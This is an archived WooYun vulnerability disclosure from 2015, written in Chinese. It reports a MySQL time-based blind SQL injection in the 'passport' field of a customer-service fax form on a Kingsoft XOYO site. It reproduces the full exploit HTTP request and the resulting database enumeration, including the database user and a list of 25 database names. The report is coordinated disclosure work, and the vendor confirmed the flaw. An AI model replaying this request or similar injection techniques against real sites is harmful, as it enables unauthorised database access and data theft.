乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-05: 细节已通知厂商并且等待厂商处理中 2015-06-05: 厂商已经确认,细节仅向厂商公开 2015-06-15: 细节向核心白帽子及相关领域专家公开 2015-06-25: 细节向普通白帽子公开 2015-07-05: 细节向实习白帽子公开 2015-07-20: 细节向公众公开
金山逍遥又一站点MySQL盲注
POST /index.php?act=fax HTTP/1.1Host: kefu.xoyo.comProxy-Connection: keep-aliveContent-Length: 2389Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://kefu.xoyo.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySkwzA9MatUHGBSPoReferer: http://kefu.xoyo.com/index.php?act=faxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: PHPSESSID=32478f1f838fa0be5ed14e44d1eee037; CNZZDATA30066337=cnzz_eid%3D707578972-1433470456-%26ntime%3D1433470456; CNZZDATA30066334=cnzz_eid%3D1351926095-1433472965-%26ntime%3D1433472965------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="flag"14334757571589823051------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="productid"13------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="hid"------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="product_business[]"2------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="passport"admin*------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="slt_gs_1"1------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="slt_gs_2"1------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="role"admin------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="level"1------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="realname"admin------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="tel"18888888888------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="original_tel"------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="oldidnumber1"------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="jsykt"------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="jsczdd"------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="tmqjd"------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="jsykt"------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="jsczdd"------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="tmqjd"------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="attachs1[]"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="attachs1[]"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="new_tel"18888888888------WebKitFormBoundarySkwzA9MatUHGBSPoContent-Disposition: form-data; name="content"content------WebKitFormBoundarySkwzA9MatUHGBSPo--
passport可注入,MySQL time blind.
current user: '[email protected].%'current database: 'newkefu'available databases [25]:[*] `database`[*] activesystem[*] charge_logs[*] design[*] ekey_logs[*] emailmarket[*] emailmarket_monitor[*] emailmarket_queue[*] events[*] gamedata[*] gamedatash[*] information_schema[*] jx3_uninstall[*] ke_survey[*] mysql[*] newkefu[*] safe_logs[*] test[*] u88[*] uds[*] uds_test[*] xd_data[*] xd_mall[*] xd_mall_new[*] xoyo_tao
参数过滤
危害等级:中
漏洞Rank:8
确认时间:2015-06-05 15:07
收到,非常感谢!
暂无